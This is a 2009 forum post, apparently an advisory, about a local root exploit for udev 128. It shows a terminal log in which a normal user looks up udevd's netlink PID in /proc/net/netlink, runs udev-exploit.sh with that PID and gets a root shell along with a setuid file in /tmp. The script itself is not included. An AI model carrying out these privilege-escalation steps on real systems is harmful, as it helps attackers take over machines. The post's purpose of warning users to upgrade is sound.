发表于 2009-4-28 19:03:18
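这是一个极高危的本地提权漏洞:下面的终端记录显示,普通用户 d00m3d 在 udevd 版本为 128 的系统上运行该脚本后,whoami 和 id 的输出均为 root(uid=0),并且 /tmp 下出现了属主为 root 的 setuid 文件 suid。受影响的系统应尽快升级 udev。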
- d00m3d@BlackMesa:/tmp$ /sbin/udevd --version
- 128
- d00m3d@BlackMesa:/tmp$ ll
- total 4
- -rw-rw-r-- 1 d00m3d d00m3d 3367 Apr 28 17:23 udev-exploit.sh
- d00m3d@BlackMesa:/tmp$ ps ax|grep udev
- 578 ? S<s 0:00 /sbin/udevd --daemon
- 2147 pts/1 S+ 0:00 grep udev
- d00m3d@BlackMesa:/tmp$ cat /proc/net/netlink
- sk Eth Pid Groups Rmem Wmem Dump Locks Drops
- f7017200 0 0 00000000 0 0 (null) 2 0
- f70e0400 10 0 00000000 0 0 (null) 2 0
- f7137200 11 0 00000000 0 0 (null) 2 0
- f73eb400 15 577 00000001 0 0 (null) 2 0
- f703be00 15 0 00000000 0 0 (null) 2 0
- f70d1a00 16 0 00000000 0 0 (null) 2 0
- f70d1c00 18 0 00000000 0 0 (null) 2 0
- d00m3d@BlackMesa:/tmp$ sh ./udev-exploit.sh 577
- suid.c: In function 'main':
- suid.c:3: warning: incompatible implicit declaration of built-in function 'execl'
- cp: `libno_ex.so.1.0' and `/tmp/libno_ex.so.1.0' are the same file
- \u@\h:\w$ whoami
- root
- \u@\h:\w$ id
- uid=0(root) gid=0(root) groups=12(video),15(cdrom),1000(d00m3d),1001(fuse),1002(nx)
- \u@\h:\w$ ls -l
- total 44
- -rwxrwxr-x 1 d00m3d d00m3d 2380 Apr 28 17:53 libno_ex.so.1.0
- -rw-rw-r-- 1 d00m3d d00m3d 232 Apr 28 17:53 program.c
- -rw-rw-r-- 1 d00m3d d00m3d 1360 Apr 28 17:53 program.o
- -rwsrwsr-x 1 root root 7172 Apr 28 17:53 suid
- -rw-rw-r-- 1 d00m3d d00m3d 80 Apr 28 17:53 suid.c
- -rwxrwxr-x 1 d00m3d d00m3d 8792 Apr 28 17:53 udev
- -rw-rw-r-- 1 d00m3d d00m3d 3367 Apr 28 17:23 udev-exploit.sh
- -rw-rw-r-- 1 d00m3d d00m3d 2216 Apr 28 17:53 udev.c
- \u@\h:\w$ groups
- root video cdrom d00m3d fuse nx
- \u@\h:\w$